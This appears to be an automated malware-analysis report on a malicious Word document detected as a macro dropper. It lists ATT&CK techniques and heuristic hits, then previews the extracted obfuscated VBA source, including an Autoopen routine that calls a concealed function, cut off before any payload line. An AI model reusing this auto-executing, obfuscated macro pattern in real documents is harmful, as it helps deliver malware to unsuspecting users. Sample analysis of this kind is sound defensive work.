MALICIOUS
262
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample contains VBA macros with AutoOpen and Shell() calls, indicating an attempt to execute arbitrary code. ClamAV detection as 'Doc.Dropper.Agent-6520242-0' further confirms its malicious nature. The VBA code is heavily obfuscated, but the presence of execution-related functions strongly suggests it acts as a dropper for a secondary payload.
Heuristics 8
-
ClamAV: Doc.Dropper.Agent-6520242-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6520242-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPENWorkbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 58224 bytes |
SHA-256: cbb54b1fa7e07a841975d19e71cec9b59e033971e6b3fae4400c69915f6a60f1 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "uwckDKOShc"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub sGKio(iQkpm)
Select Case PBBCR
Case 9126
ROjLr = RiljE
ZiPwRj = Round(30796)
iYtddv = Hex(pllzw - ChrW(tJGIuT))
WXskf = NdAEk
Case 36472
QisVF = CByte(66610)
ucsAiI = Log(fYJnWQ)
End Select
End Sub
Sub RLjJwP(mpjAiu)
Select Case KRkDL
Case 45356
uirBXY = FrQNCJ
XLLHTO = Round(15030)
MzDNUV = Hex(YkKsO - ChrW(joHar))
hzQnb = WmFZvs
Case 17500
HSrzJ = CByte(8343)
zTfCK = Log(brXDhc)
End Select
Select Case aowMb
Case 55093
iCwpRj = PNwJRm
jikkRp = Round(90370)
iVOQuv = Hex(WfVjG - ChrW(uUqkaD))
dauPp = qJLcKm
Case 5064
UdaBow = CByte(93970)
RnkfJo = Log(TzrMj)
End Select
Select Case HbwbT
Case 9012
KCLuE = aqPjlG
mIGfJ = Round(33348)
zScSz = Hex(VMCcZ - ChrW(snjPb))
bSOTdP = jUizV
Case 36678
CCJsZ = CByte(87060)
kVOonJ = Log(OaGsi)
End Select
End Sub
Sub hznfoM(TzrMj)
Select Case ISpin
Case 79312
vrwAfq = pStXG
dkDPiD = Round(25374)
bliBHi = Hex(wZwSD - ChrW(tqCmAw))
XBFTF = fXOZAk
Case 53945
UFSzX = CByte(23156)
qswED = Log(ktBcdF)
End Select
Select Case IZfKv
Case 34465
djzwib = Ykjndm
hIJPC = Round(90215)
dNwWiV = Hex(uaIDFN - ChrW(HtzVbB))
JRpAS = bRWvs
Case 44250
zVCaE = CByte(12116)
dKakXZ = Log(ZPJtbt)
End Select
End Sub
Sub Autoopen()
On Error Resume Next
Select Case UvHVLQ
Case 34657
DNKiJb = qZRVBh
qEctiB = Round(4813)
BRdUf = Hex(vFsqhA - ChrW(NZpPw))
YkbFrB = FCsSl
Case 31367
qLtEpw = CByte(21408)
TZfThs = Log(fnifNd)
End Select
uFljYwLzRth (aLmSJU + sXCUnwNkvpbs + MZERZP)
Select Case jlZCd
Case 56286
BaXUc = XFnFDw
lhSXm = Round(81178)
HzaCH = Hex(bzBEdj - ChrW(MYlOz))
sUHmwO = BQzSCP
Case 75604
JBzVN = CByte(245)
YDjcT = Log(BMwEZF)
End Select
End Sub
Sub izNcni(KAjCNw)
Select Case DWlsjj
Case 85220
EDWujA = COcKq
JoXhjY = Round(80455)
UjOXV = Hex(qLMqYE - ChrW(vKFtzb))
zVZDG = tiNKAH
Case 4771
jWHXK = CByte(3639)
rCmll = Log(OdRol)
End Select
Select Case iazGLR
Case 74479
HzBpQ = MLowW
ZtFTnR = Round(40507)
fEvVOJ = Hex(wkPvF - ChrW(zFuAw))
isCpT = wYpVj
Case 37355
wJZDBj = CByte(51210)
iOaZC = Log(ObnLS)
End Select
Select Case wmkcOc
Case 5559
lidEv = JOXCs
WNzic = Round(31566)
CjwCK = Hex(czJZw - ChrW(ZdKVEl))
dBGAD = SwUimF
Case 507
MAjobS = CByte(83858)
DzpbO = Log(qLsvs)
End Select
End Sub
Sub nOvjs(rOHPX)
Select Case wqNci
Case 63580
SiKwHK = WAIIqr
uLzEw = Round(91604)
bdLoc = Hex(iYFNh - ChrW(SabcP))
YQurFw = fFCiP
Case 45938
lSqAzK = CByte(59199)
wwvubf = Log(nSihQ)
End Select
End Sub
Attribute VB_Name = "fQkXMPwQbt"
Sub pzZAja(FJkRvv)
Select Case XtGSk
Case 92401
HJFCGd = viXWFF
bFZDr = Round(9087)
HnNUoL = Hex(VqzrzH - ChrW(pTwdzr))
bMvqp = vohPt
Case 8
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.